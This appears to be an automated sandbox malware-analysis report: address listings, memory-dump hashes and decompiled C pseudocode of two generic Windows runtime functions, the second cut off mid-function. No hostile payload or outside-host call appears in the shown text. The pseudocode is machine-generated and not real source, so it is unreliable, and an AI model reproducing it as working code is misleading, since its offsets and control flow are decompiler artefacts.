                                                                                            0x04d3b524
                                                                                            0x04cedce7
                                                                                            0x04cedce7
                                                                                            0x04cedce7
                                                                                            0x00000000
                                                                                            0x04cedce7
                                                                                            0x00000000
                                                                                            0x04cedb2a
                                                                                            0x04cedb2c
                                                                                            0x04cedb31
                                                                                            0x04cedb33
                                                                                            0x04cedb36
                                                                                            0x04cedb39
                                                                                            0x04cedb3b
                                                                                            0x04cedb66
                                                                                            0x04cedb66
                                                                                            0x04cedb3d
                                                                                            0x04cedb3d
                                                                                            0x04cedb3e
                                                                                            0x04cedb46
                                                                                            0x04cedb47
                                                                                            0x04cedb49
                                                                                            0x04cedb4c
                                                                                            0x04cedb53
                                                                                            0x04cedb55
                                                                                            0x04cedb58
                                                                                            0x04cedb5a
                                                                                            0x04d3b50a
                                                                                            0x04d3b50f
                                                                                            0x04d3b512
                                                                                            0x04cedb60
                                                                                            0x04cedb60
                                                                                            0x04cedb63
                                                                                            0x04cedb63
                                                                                            0x00000000
                                                                                            0x04cedb63
                                                                                            0x04cedb5a
                                                                                            0x04cedb3b
                                                                                            0x04cedb24
                                                                                            0x04cedb69
                                                                                            0x04cedb69
                                                                                            0x04cedb6c
                                                                                            0x04cedb6f
                                                                                            0x04cedb74
                                                                                            0x04d3b557
                                                                                            0x04d3b557
                                                                                            0x04d3b55e
                                                                                            0x04cedb7a
                                                                                            0x04cedb7c
                                                                                            0x04cedb7f
                                                                                            0x04cedb82
                                                                                            0x04cedb85
                                                                                            0x00000000
                                                                                            0x04cedb8b
                                                                                            0x04cedb8b
                                                                                            0x04cedb8d
                                                                                            0x04cedb9b
                                                                                            0x04cedb9b
                                                                                            0x04cedb9d
                                                                                            0x04cedba0
                                                                                            0x04cedba2
                                                                                            0x04cedba4
                                                                                            0x04cedba7
                                                                                            0x04cedba9
                                                                                            0x04cedbae
                                                                                            0x04cedbae
                                                                                            0x04cedbb1
                                                                                            0x04cedbb4
                                                                                            0x04cedbb4
                                                                                            0x04cedbb7
                                                                                            0x04cedbba
                                                                                            0x04cedcd2
                                                                                            0x04cedcd4
                                                                                            0x00000000
                                                                                            0x04cedbc0
                                                                                            0x04cedbc0
                                                                                            0x04cedbd2
                                                                                            0x04cedbd7
                                                                                            0x04cedbda
                                                                                            0x04cedbdd
                                                                                            0x04cedbdf
                                                                                            0x00000000
                                                                                            0x04cedbe5
                                                                                            0x04cedbe5
                                                                                            0x04cedbee
                                                                                            0x04cedbf1
                                                                                            0x04d3b541
                                                                                            0x04d3b544
                                                                                            0x00000000
                                                                                            0x04d3b546
                                                                                            0x04d3b546
                                                                                            0x00000000
                                                                                            0x04d3b546
                                                                                            0x04cedbf7
                                                                                            0x04cedbf7
                                                                                            0x04cedbfd
                                                                                            0x04cedbfd
                                                                                            0x04cedbff
                                                                                            0x04cedc0b
                                                                                            0x04cedc15
                                                                                            0x04cedc1b
                                                                                            0x04cedc1d
                                                                                            0x04cedc21
                                                                                            0x04cedc21
                                                                                            0x04cedc23
                                                                                            0x04cedc23
                                                                                            0x04cedc26
                                                                                            0x04cedc29
                                                                                            0x04cedc2b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cedc31
                                                                                            0x04cedc34
                                                                                            0x04cedc36
                                                                                            0x04cedcbf
                                                                                            0x04cedcbf
                                                                                            0x04cedcc2
                                                                                            0x00000000
                                                                                            0x04cedc3c
                                                                                            0x04cedc41
                                                                                            0x04cedc43
                                                                                            0x00000000
                                                                                            0x04cedc45
                                                                                            0x04cedc45
                                                                                            0x04cedc47
                                                                                            0x00000000
                                                                                            0x04cedc4d
                                                                                            0x04cedc4d
                                                                                            0x04cedc50
                                                                                            0x04cedc52
                                                                                            0x04cedc55
                                                                                            0x04cedcfa
                                                                                            0x04cedcfe
                                                                                            0x04cedd08
                                                                                            0x04cedd0a
                                                                                            0x04cedd0c
                                                                                            0x00000000
                                                                                            0x04cedd12
                                                                                            0x04cedd15
                                                                                            0x04cedd2d
                                                                                            0x04cedd2f
                                                                                            0x04cedd32
                                                                                            0x04cedd35
                                                                                            0x00000000
                                                                                            0x04cedd35
                                                                                            0x04cedc5b
                                                                                            0x04cedc5b
                                                                                            0x04cedc5e
                                                                                            0x04cedc61
                                                                                            0x04cedc64
                                                                                            0x04cedc67
                                                                                            0x04cedc67
                                                                                            0x04cedc6a
                                                                                            0x04cedc6c
                                                                                            0x04cedc8e
                                                                                            0x04cedc8e
                                                                                            0x04cedc91
                                                                                            0x04cedc93
                                                                                            0x04cedcce
                                                                                            0x04cedcce
                                                                                            0x04cedc95
                                                                                            0x04cedc9c
                                                                                            0x04cedc6e
                                                                                            0x04cedc72
                                                                                            0x04cedc75
                                                                                            0x04cedc77
                                                                                            0x04cedc79
                                                                                            0x04d3b551
                                                                                            0x04d3b551
                                                                                            0x00000000
                                                                                            0x04cedc7f
                                                                                            0x04cedc7f
                                                                                            0x04cedc81
                                                                                            0x00000000
                                                                                            0x04cedc83
                                                                                            0x04cedc86
                                                                                            0x04cedc88
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cedc88
                                                                                            0x04cedc81
                                                                                            0x04cedc79
                                                                                            0x04cedc6c
                                                                                            0x04cedc55
                                                                                            0x04cedc47
                                                                                            0x04cedc43
                                                                                            0x00000000
                                                                                            0x04cedc36
                                                                                            0x04cedc23
                                                                                            0x00000000
                                                                                            0x04cedbff
                                                                                            0x04cedbf1
                                                                                            0x04cedbdf
                                                                                            0x04cedb8f
                                                                                            0x04cedb92
                                                                                            0x04cedb95
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cedb95
                                                                                            0x04cedb8d
                                                                                            0x04cedb85
                                                                                            0x04cedb74
                                                                                            0x04cedc9f
                                                                                            0x04cedca2
                                                                                            0x04cedcb0
                                                                                            0x04cedcb0
                                                                                            0x04cedad1
                                                                                            0x04d3b4e5
                                                                                            0x04d3b4c8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ced831
                                                                                            0x04ced80d
                                                                                            0x00000000
                                                                                            0x04ced800
                                                                                            0x04d3b47f
                                                                                            0x04d3b485
                                                                                            0x00000000
                                                                                            0x04d3b485
                                                                                            0x04ced665
                                                                                            0x04ced652
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 08ddd68cf7ac2a375eb3b76ac8f0e95332087f0ce5aa8b1bf35cb4b385c5701d
                                                                                            • Instruction ID: 715ae4dc38505ac29de2dc1fd9eb810cc9438ef993e8eb6a8777765cf12eba26
                                                                                            • Opcode Fuzzy Hash: 08ddd68cf7ac2a375eb3b76ac8f0e95332087f0ce5aa8b1bf35cb4b385c5701d
                                                                                            • Instruction Fuzzy Hash: 9BE18F30B0025ACFEB24DF26C994BB9B7B6BF45318F04419AD90A9B291D734BE81CB51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CE849B, Relevance: .3, Instructions: 290COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 92%
                                                                                            			E04CE849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x4daf9c0);
				E04D2D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x4dc7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E04CECEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04CF2280( *[fs:0x30], 0x4dc8550);
						_t139 =  *0x4dc7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E04D0F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E04CEFFB0(_t193, _t235, 0x4dc8550);
								L5:
								return E04D2D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04CD1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x4dc7b9c; // 0x0
							_t235 = L04CF4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x4dc7b10; // 0x10
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E04D0A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E04CEFFB0(_t193, _t235, 0x4dc8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L04CF77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L04CF77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x4dc7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x4dc7b10; // 0x10
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E04D137C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x4dc7b9c; // 0x0
									_t214 = L04CF4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E04D137F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x4dc7b10 =  *0x4dc7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x4dc7b04 =  *0x4dc7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L04CF77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L04CF77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x4dc7b08 =  *0x4dc7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E04D157C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E04D1F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L04CF77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E04D0A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L04CF77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E04D196C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                                            0x04ce849b
                                                                                            0x04ce849b
                                                                                            0x04ce849b
                                                                                            0x04ce849b
                                                                                            0x04ce849d
                                                                                            0x04ce84a2
                                                                                            0x04ce84a7
                                                                                            0x04ce84b1
                                                                                            0x04ce84d8
                                                                                            0x00000000
                                                                                            0x04ce84b3
                                                                                            0x04ce84c4
                                                                                            0x04ce84c9
                                                                                            0x04ce84cd
                                                                                            0x04ce84cf
                                                                                            0x04ce84cf
                                                                                            0x04ce84d6
                                                                                            0x04ce84e6
                                                                                            0x04ce84e9
                                                                                            0x04ce84ec
                                                                                            0x04ce84ef
                                                                                            0x04ce84f2
                                                                                            0x04ce84f4
                                                                                            0x04ce84fc
                                                                                            0x04ce8501
                                                                                            0x04ce8506
                                                                                            0x04ce8509
                                                                                            0x04ce86e0
                                                                                            0x04ce86e5
                                                                                            0x04ce86e8
                                                                                            0x04ce86ed
                                                                                            0x04ce86f0
                                                                                            0x04ce86f2
                                                                                            0x04d39afd
                                                                                            0x04d39b02
                                                                                            0x04ce84da
                                                                                            0x04ce84df
                                                                                            0x04ce84df
                                                                                            0x04ce86fa
                                                                                            0x04ce86fd
                                                                                            0x04ce86fe
                                                                                            0x04ce8701
                                                                                            0x04ce8706
                                                                                            0x04ce8709
                                                                                            0x04ce870b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ce8711
                                                                                            0x04ce8725
                                                                                            0x04ce8727
                                                                                            0x04ce872a
                                                                                            0x04ce872c
                                                                                            0x04d39af0
                                                                                            0x04d39af5
                                                                                            0x04ce8732
                                                                                            0x04ce8732
                                                                                            0x04ce8732
                                                                                            0x04ce8735
                                                                                            0x04ce8737
                                                                                            0x04ce8515
                                                                                            0x04ce8515
                                                                                            0x04ce8518
                                                                                            0x04ce851d
                                                                                            0x04ce8523
                                                                                            0x04ce8527
                                                                                            0x04ce852b
                                                                                            0x04ce8537
                                                                                            0x04ce8539
                                                                                            0x04ce853c
                                                                                            0x04ce853e
                                                                                            0x04ce868c
                                                                                            0x04ce8691
                                                                                            0x04ce8699
                                                                                            0x04ce869b
                                                                                            0x04ce8744
                                                                                            0x04ce8748
                                                                                            0x04ce86a1
                                                                                            0x04ce86a1
                                                                                            0x04ce86a1
                                                                                            0x04ce86a4
                                                                                            0x04ce86a8
                                                                                            0x04d39bdf
                                                                                            0x04d39bdf
                                                                                            0x04ce86ae
                                                                                            0x04ce86b0
                                                                                            0x00000000
                                                                                            0x04ce86b6
                                                                                            0x00000000
                                                                                            0x04d39be9
                                                                                            0x04ce86b0
                                                                                            0x04ce8544
                                                                                            0x04ce854a
                                                                                            0x04ce854d
                                                                                            0x04ce8551
                                                                                            0x04ce876e
                                                                                            0x04ce8778
                                                                                            0x04ce877b
                                                                                            0x04ce8780
                                                                                            0x04ce8557
                                                                                            0x04ce8557
                                                                                            0x04ce855d
                                                                                            0x04ce855d
                                                                                            0x04ce856b
                                                                                            0x04ce856e
                                                                                            0x04ce8570
                                                                                            0x04ce8573
                                                                                            0x04ce8576
                                                                                            0x04ce8576
                                                                                            0x04ce8579
                                                                                            0x04ce857b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ce8581
                                                                                            0x04ce85a0
                                                                                            0x04ce85a2
                                                                                            0x04ce85a5
                                                                                            0x04ce85a7
                                                                                            0x04d39b1b
                                                                                            0x04d39b1b
                                                                                            0x04ce862e
                                                                                            0x04ce862e
                                                                                            0x04ce8631
                                                                                            0x04ce8631
                                                                                            0x04ce8634
                                                                                            0x04ce8636
                                                                                            0x04ce8669
                                                                                            0x04ce8669
                                                                                            0x04ce866b
                                                                                            0x04d39bbf
                                                                                            0x04d39bc4
                                                                                            0x04d39bc8
                                                                                            0x04d39bce
                                                                                            0x04d39bce
                                                                                            0x04ce8671
                                                                                            0x04ce8671
                                                                                            0x04ce8674
                                                                                            0x04ce8676
                                                                                            0x04d39bae
                                                                                            0x04d39bae
                                                                                            0x04ce8676
                                                                                            0x04ce867c
                                                                                            0x04ce867e
                                                                                            0x04ce8688
                                                                                            0x04ce8688
                                                                                            0x00000000
                                                                                            0x04ce867e
                                                                                            0x04ce8638
                                                                                            0x04ce8638
                                                                                            0x04ce863b
                                                                                            0x04ce863e
                                                                                            0x04ce863f
                                                                                            0x04ce8642
                                                                                            0x04ce8645
                                                                                            0x04ce8648
                                                                                            0x04ce864d
                                                                                            0x04d39b69
                                                                                            0x04d39b6e
                                                                                            0x04d39b7b
                                                                                            0x04d39b81
                                                                                            0x04d39b85
                                                                                            0x04d39b89
                                                                                            0x04d39ba7
                                                                                            0x04d39b8b
                                                                                            0x04d39b91
                                                                                            0x04d39b9a
                                                                                            0x04d39b9f
                                                                                            0x04d39b9f
                                                                                            0x04ce8788
                                                                                            0x04ce878d
                                                                                            0x04ce8763
                                                                                            0x04ce8763
                                                                                            0x04ce8766
                                                                                            0x00000000
                                                                                            0x04ce8766
                                                                                            0x04d39b70
                                                                                            0x00000000
                                                                                            0x04d39b70
                                                                                            0x04ce8656
                                                                                            0x04ce865a
                                                                                            0x04ce865c
                                                                                            0x04ce8752
                                                                                            0x04ce8756
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ce875e
                                                                                            0x00000000
                                                                                            0x04ce875e
                                                                                            0x04ce8662
                                                                                            0x04ce8662
                                                                                            0x04ce8662
                                                                                            0x04ce8666
                                                                                            0x00000000
                                                                                            0x04ce8666
                                                                                            0x04ce85b7
                                                                                            0x04ce85b9
                                                                                            0x04ce85bc
                                                                                            0x04ce85bf
                                                                                            0x04ce85cc
                                                                                            0x04ce85d1
                                                                                            0x04ce85d4
                                                                                            0x04ce85db
                                                                                            0x04ce85de
                                                                                            0x04ce85e0
                                                                                            0x04d39b5f
                                                                                            0x00000000
                                                                                            0x04d39b5f
                                                                                            0x04ce85e6
                                                                                            0x04ce85ea
                                                                                            0x04ce86c3
                                                                                            0x04ce86c5
                                                                                            0x04ce86c8
                                                                                            0x04ce86ca
                                                                                            0x04d39b16
                                                                                            0x00000000
                                                                                            0x04d39b16
                                                                                            0x04ce86d6
                                                                                            0x04ce85f6
                                                                                            0x04ce85f6
                                                                                            0x04ce85f9
                                                                                            0x04ce8602
                                                                                            0x04ce8606
                                                                                            0x04ce860a
                                                                                            0x04ce860b
                                                                                            0x04ce860e
                                                                                            0x04ce8611
                                                                                            0x00000000
                                                                                            0x04ce8611
                                                                                            0x04ce85f3
                                                                                            0x00000000
                                                                                            0x04ce85f3
                                                                                            0x04ce8619
                                                                                            0x04ce861e
                                                                                            0x04ce861e
                                                                                            0x04ce8621
                                                                                            0x04ce8622
                                                                                            0x04ce8623
                                                                                            0x04ce8625
                                                                                            0x04ce862c
                                                                                            0x00000000
                                                                                            0x04ce873d
                                                                                            0x00000000
                                                                                            0x04ce873d
                                                                                            0x04ce8737
                                                                                            0x04ce850f
                                                                                            0x04ce8512
                                                                                            0x00000000
                                                                                            0x04ce8512
                                                                                            0x00000000
                                                                                            0x04ce84d6

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c096fed1958d552e8a905ad5ca4058490dbb93dd0fb7584c99099825519b1eb8
                                                                                            • Instruction ID: 193cd3f88c04ee38ff76f6ae9f4c17baac01a741a825e5d81c980ec24ffc57ff
                                                                                            • Opcode Fuzzy Hash: c096fed1958d552e8a905ad5ca4058490dbb93dd0fb7584c99099825519b1eb8
                                                                                            • Instruction Fuzzy Hash: 6EB16BB0F0020ADFDB15EF9AC994AADBBBAFF44304F14412AE505AB345D774B941DBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D0513A, Relevance: .3, Instructions: 258COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 67%
                                                                                            			E04D0513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4dcd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E04D1D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04CF2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04CF4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E04D1F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
